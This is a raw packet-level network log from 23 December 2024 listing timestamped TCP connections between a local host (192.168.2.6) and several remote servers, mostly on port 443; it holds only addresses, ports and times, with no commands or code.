                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:33.551774025 CET49771443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:33.551779985 CET44349771188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:34.438010931 CET44349771188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:34.438031912 CET44349771188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:34.438100100 CET44349771188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:34.438205957 CET49771443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:34.438285112 CET49771443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:34.440839052 CET49771443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:34.440881968 CET44349771188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:34.443013906 CET49777443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:34.443083048 CET44349777188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:34.443249941 CET49777443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:34.443501949 CET49777443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:34.443525076 CET44349777188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:35.846256018 CET44349777188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:35.846374035 CET49777443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:35.846839905 CET49777443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:35.846847057 CET44349777188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:35.848501921 CET49777443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:35.848506927 CET44349777188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:36.748441935 CET44349777188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:36.748476028 CET44349777188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:36.748533010 CET49777443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:36.748539925 CET44349777188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:36.748553991 CET44349777188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:36.748572111 CET49777443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:36.748619080 CET49777443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:36.749063015 CET49777443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:36.749070883 CET44349777188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:36.750679970 CET49784443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:36.750734091 CET44349784188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:36.750824928 CET49784443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:36.751019001 CET49784443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:36.751039982 CET44349784188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:38.159009933 CET44349784188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:38.159075975 CET49784443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:38.159488916 CET49784443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:38.159495115 CET44349784188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:38.161510944 CET49784443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:38.161515951 CET44349784188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:39.044364929 CET44349784188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:39.044426918 CET44349784188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:39.044508934 CET49784443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:39.044574976 CET49784443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:39.044850111 CET49784443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:39.044868946 CET44349784188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:39.062464952 CET49790443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:39.062508106 CET44349790188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:39.062592030 CET49790443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:39.062817097 CET49790443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:39.062827110 CET44349790188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:40.066800117 CET49793443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:40.066855907 CET44349793188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:40.066931009 CET49793443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:40.067198992 CET49793443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:40.067215919 CET44349793188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:40.473901987 CET44349790188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:40.475958109 CET49790443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:40.495064974 CET49790443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:40.495099068 CET44349790188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:40.507740974 CET49790443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:40.507749081 CET44349790188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:40.507785082 CET49790443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:40.507793903 CET44349790188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.479568958 CET44349790188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.479660034 CET49790443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.479671955 CET44349790188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.479674101 CET44349793188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.479742050 CET49793443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.479743004 CET49790443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.479748011 CET44349790188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.479768038 CET44349790188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.479793072 CET49790443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.479830027 CET49790443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.480241060 CET49793443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.480247974 CET44349793188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.480628967 CET49790443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.480647087 CET44349790188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.482311964 CET49793443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.482319117 CET44349793188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.071865082 CET49798443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.071980953 CET4434979820.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.072139025 CET49798443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.074265957 CET49798443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.074299097 CET4434979820.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.551556110 CET44349793188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.551635981 CET49793443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.551645994 CET44349793188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.551711082 CET49793443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.552598953 CET49793443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.552619934 CET44349793188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.756916046 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.756959915 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.757021904 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.757688999 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.757708073 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.236084938 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.236140013 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.236319065 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.236633062 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.236645937 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.298207998 CET49808443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.298239946 CET44349808172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.298316002 CET49808443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.298631907 CET49808443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.298656940 CET44349808172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.394130945 CET49809443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.394171000 CET44349809172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.394386053 CET49809443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.394695044 CET49809443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.394714117 CET44349809172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.306425095 CET4434979820.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.306525946 CET49798443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.308191061 CET49798443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.308221102 CET4434979820.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.308532000 CET4434979820.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.310364008 CET49798443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.310444117 CET49798443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.310451031 CET4434979820.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.310587883 CET49798443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.312932014 CET4970080192.168.2.6151.101.194.133
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.351375103 CET4434979820.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.433633089 CET8049700151.101.194.133192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.433736086 CET4970080192.168.2.6151.101.194.133
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.458149910 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.459358931 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.459403992 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.461546898 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.461632013 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.462693930 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.462785959 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.462913990 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.507337093 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.510430098 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.510457039 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.562048912 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.852550983 CET4434979820.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.852669954 CET4434979820.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.856290102 CET49798443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.856489897 CET49798443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.856530905 CET4434979820.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.926141977 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.926466942 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.926498890 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.927555084 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.927620888 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.928019047 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.928081989 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.928258896 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.928268909 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.968224049 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.994102001 CET44349808172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.996309042 CET49808443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.996326923 CET44349808172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.998167038 CET44349808172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.998301029 CET49808443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.999488115 CET49808443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.999587059 CET44349808172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.999660969 CET49808443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.046363115 CET49808443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.046375036 CET44349808172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.086159945 CET44349809172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.086385012 CET49809443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.086417913 CET44349809172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.087910891 CET44349809172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.087977886 CET49809443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.088339090 CET49809443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.088423967 CET44349809172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.093223095 CET49808443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.140156031 CET49809443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.140175104 CET44349809172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.193408012 CET49809443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.332046986 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.332165003 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.332226992 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.332248926 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.352575064 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.352632046 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.352647066 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.360970974 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.361022949 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.361032963 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.368789911 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.368845940 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.368962049 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.368978024 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.793963909 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.794008970 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.794039965 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.794064999 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.794085026 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.794114113 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.794137001 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.821820021 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.821882963 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.821892977 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.828816891 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.828866959 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.828875065 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.838324070 CET44349808172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.838445902 CET44349808172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.838543892 CET49808443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.839400053 CET49808443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.839425087 CET44349808172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.874835968 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.874850988 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.913575888 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.913640976 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.913671970 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.968590975 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.980561972 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.988267899 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.988372087 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.988409996 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.000866890 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.000977993 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.000993013 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.014420986 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.014470100 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.014486074 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.028072119 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.028119087 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.028131008 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.041695118 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.041740894 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.041750908 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.055607080 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.055731058 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.055741072 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.069109917 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.069169998 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.069207907 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.082374096 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.082402945 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.082432032 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.082463980 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.082685947 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.095261097 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.108437061 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.108486891 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.108514071 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.121525049 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.121577978 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.121592045 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.178019047 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.178054094 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.178113937 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.178144932 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.178184986 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.180140972 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.186742067 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.186800003 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.186808109 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.200165033 CET44349806172.217.21.36192.168.2.6
